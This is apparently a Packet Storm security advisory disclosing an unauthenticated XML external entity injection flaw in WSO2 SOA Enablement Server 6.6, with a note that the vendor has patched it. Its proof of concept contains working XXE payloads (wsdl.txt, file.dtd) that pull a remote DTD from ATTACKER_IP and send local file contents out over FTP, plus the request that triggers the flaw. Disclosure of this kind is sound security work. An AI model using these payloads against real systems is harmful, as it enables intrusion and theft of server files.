WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616 suffers from an XML external entity injection vulnerability.
d9e516d3777daf410177b4c7a8c4a54f5f7f7677f5de9b1ae66ff8fa3a81c9c2Title: WSO2 SOA Enablement Server - XML External Entity Injection
Authors: Pawel Gocyla, Jakub Palaczynski
Date: 08. June 2016
Affected Software:
==================
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616
Probably other versions are also vulnerable.
Vulnerability:
**************
XML External Entity Injection:
==============================
It must be noted that this vulnerability is exploitable without
authentication.
Proof of Concept:
1. An attacker sets up web server that serves two files (wsdl.txt and
file.dtd):
wsdl.txt:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://ATTACKER_IP/file.dtd
">%remote;%int;%trick;]>
file.dtd:
<!ENTITY % payl SYSTEM "file:///C:/">
<!ENTITY % int "<!ENTITY % trick SYSTEM 'ftp://ATTACKER_IP/%payl;'>">
2. An attacker sets up FTP server that logs every command executed on the
server.
3. An attacker sends request that triggers vulnerability:
https://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl=http://attacker_ip/wsdl.txt
FIX:
====
Patches were already released by the vendor.
Contact:
========
pawellgocyla[at]gmail[dot]com
jakub.palaczynski[at]gmail[dot]com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed